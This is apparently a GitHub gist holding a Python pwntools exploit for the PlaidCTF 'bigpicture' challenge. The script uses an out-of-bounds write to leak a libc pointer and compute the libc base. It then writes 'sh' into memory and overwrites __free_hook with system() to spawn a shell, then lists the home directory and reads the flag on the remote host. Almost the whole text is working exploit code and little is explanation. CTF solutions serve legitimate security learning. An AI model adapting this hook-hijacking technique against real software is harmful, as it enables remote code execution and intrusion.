Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
from pwn import *
import struct
WIDTH = 1
HEIGHT = 1000000
LOCAL = False
if LOCAL:
FREE_HOOK_OFFSET = -1230952
LIBC_LEAK = -1241056
else:
FREE_HOOK_OFFSET = -1214568
LIBC_LEAK = -1224672
# Write a 8 byte value to the provided address
def write(target, val):
for i in range(0,8):
line = "-0, %d, %c" % (target+i, chr(val >> (i * 8) & 0xFF))
p.sendlineafter('>', line)
# Leak data via the 'overwriting' message
def read(target, count):
data = 0
for i in range(0,count):
line = "-0, %d, A" % (target+count-1-i)
p.sendlineafter('>', line)
p.recvuntil('overwriting ')
data = data << 8 | (ord(p.recv(1)))
return data
libc = ELF('./libc-2.23.so')
print 'PlaidCTF bigpicture POC... by @_xpn_'
if LOCAL:
p = process('./bigpicture')
else:
p = remote('bigpicture.chal.pwning.xxx', 420)
print '[/] Sending our size of %d x %d' % (WIDTH, HEIGHT)
p.sendline(str(WIDTH) + ' x ' + str(HEIGHT))
print '[/] Attempting to leak pointer from LibC'
data = read(LIBC_LEAK, 6)
print '[/] Pointer leaked as %x' % (data)
print "[/] LibC base address calculated as: %x" % (data - 129030)
# Update our local libc memory address
libc.address = data - 129030
print "[/] system() address %x " % (libc.symbols['system'])
print "[/] Writing 'sh' to memory"
write(0, ord('s'))
write(1, ord('h'))
print "[/] Setting __free_hook() -> system()"
write(FREE_HOOK_OFFSET, libc.symbols['system'])
print "[/] All done, hopefully we have a shell!"
p.sendlineafter('>','quit')
p.sendline('ls -alF /home/bigpicture/' )
p.sendline('cat /home/bigpicture/flag' )
while True:
print p.recv()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment